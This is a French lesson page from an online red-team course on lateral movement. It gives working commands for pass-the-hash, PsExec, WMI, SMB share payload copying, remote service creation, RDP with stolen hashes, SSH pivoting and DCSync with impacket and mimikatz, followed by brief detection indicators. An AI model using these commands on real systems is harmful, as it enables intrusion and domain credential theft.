Techniques de déplacement latéral
Déplacez-vous dans les réseaux avec WMI, PsExec, WinRM et les partages SMB sans déclencher d’alertes.
Techniques de déplacement latéral est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu’est-ce que le déplacement latéral ?
Le déplacement latéral désigne l’ensemble des techniques utilisées par les attaquants pour progresser dans un réseau après la compromission initiale, en pivotant depuis le premier point d’appui vers des cibles de plus grande valeur comme les contrôleurs de domaine, les bases de données et les systèmes de sauvegarde.
Transmission du hachage (PtH)
L’authentification NTLM de Windows permet d’utiliser directement le hachage du mot de passe au lieu du mot de passe en clair. Un attaquant qui a extrait des hachages NTLM peut s’authentifier auprès d’autres systèmes sans casser le hachage.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHTransmission du ticket (PtT)
Les tickets Kerberos (TGT ou TGS) peuvent être extraits de la mémoire et importés pour s’authentifier en tant que détenteur du ticket. Les attaques par ticket d’or forgent des TGT à l’aide du hachage KRBTGT, fournissant un accès Kerberos illimité au domaine.
Exécution de code à distance : PSExec
psexec (Sysinternals et Impacket) exécute des commandes sur des hôtes Windows distants via SMB et des partages d’administration. Des identifiants d’administrateur sont nécessaires. Un binaire de service est créé sur la cible.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecDéplacement latéral avec WMI
Windows Management Instrumentation permet l’exécution de code à distance sans créer de fichiers détectables par de nombreux outils :
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB et partages d’administration
Les partages d’administration Windows (C$, ADMIN$, IPC$) permettent le déplacement latéral avec des identifiants d’administrateur :
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Services distants : sc et at
Créez des services ou des tâches planifiées sur des systèmes distants :
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP et sessions interactives
RDP (protocole Bureau à distance, port 3389) fournit un accès interactif complet. Les attaquants utilisent RDP avec des identifiants volés. Défense : limitez RDP aux serveurs bastion, exigez NLA et journalisez toutes les sessions.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH comme moyen de déplacement latéral
Dans les environnements Linux, SSH permet de se déplacer latéralement avec des clés ou des identifiants volés. L’abus de l’acheminement de l’agent permet de pivoter via des hôtes compromis. Les tunnels SSH redirigent les ports afin d’atteindre des systèmes autrement inaccessibles.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostRéplication Active Directory (DCSync)
DCSync exploite la réplication AD pour extraire directement les hachages de mots de passe du DC sans y exécuter de code ; le privilège DS-Replication-Get-Changes-All est nécessaire :
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtDétection du déplacement latéral
Indicateurs de détection :
- Événement 4624 (ouverture de session) avec des ouvertures de session inhabituelles de type 3 (réseau)
- Création de services sur des hôtes distants (événement 7045)
- Connexions SMB entre postes de travail
- Création de processus WMI sur des hôtes distants
- Comportement inhabituel des comptes (utilisateur se connectant depuis plusieurs machines)
Vérification rapide : déplacement latéral
Quelle technique permet à un attaquant de s’authentifier auprès de systèmes Windows avec un hachage NTLM capturé sans le casser ?
Récapitulatif de la leçon
Le déplacement latéral utilise des identifiants et des protocoles compromis pour se propager dans le réseau. Techniques clés : transmission du hachage (réutilisation du hachage NTLM), transmission du ticket (Kerberos), PSExec/WMI/SMB pour l’exécution à distance et DCSync pour la collecte des identifiants du domaine. Détection : ouvertures de session réseau inhabituelles (événement 4624), création de services distants (événement 7045) et trafic SMB entre postes de travail.
Questions Fréquemment Posées
La leçon « Techniques de déplacement latéral » est-elle gratuite ?
Oui — le texte complet de « Techniques de déplacement latéral » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Techniques de déplacement latéral » ?
Déplacez-vous dans les réseaux avec WMI, PsExec, WinRM et les partages SMB sans déclencher d’alertes. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Techniques de déplacement latéral » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Cadres C2 : Cobalt Strike et Sliver
- Binaires Living-Off-the-Land (LOLBins)
- Techniques de déplacement latéral
- Rédaction de rapports d’équipe rouge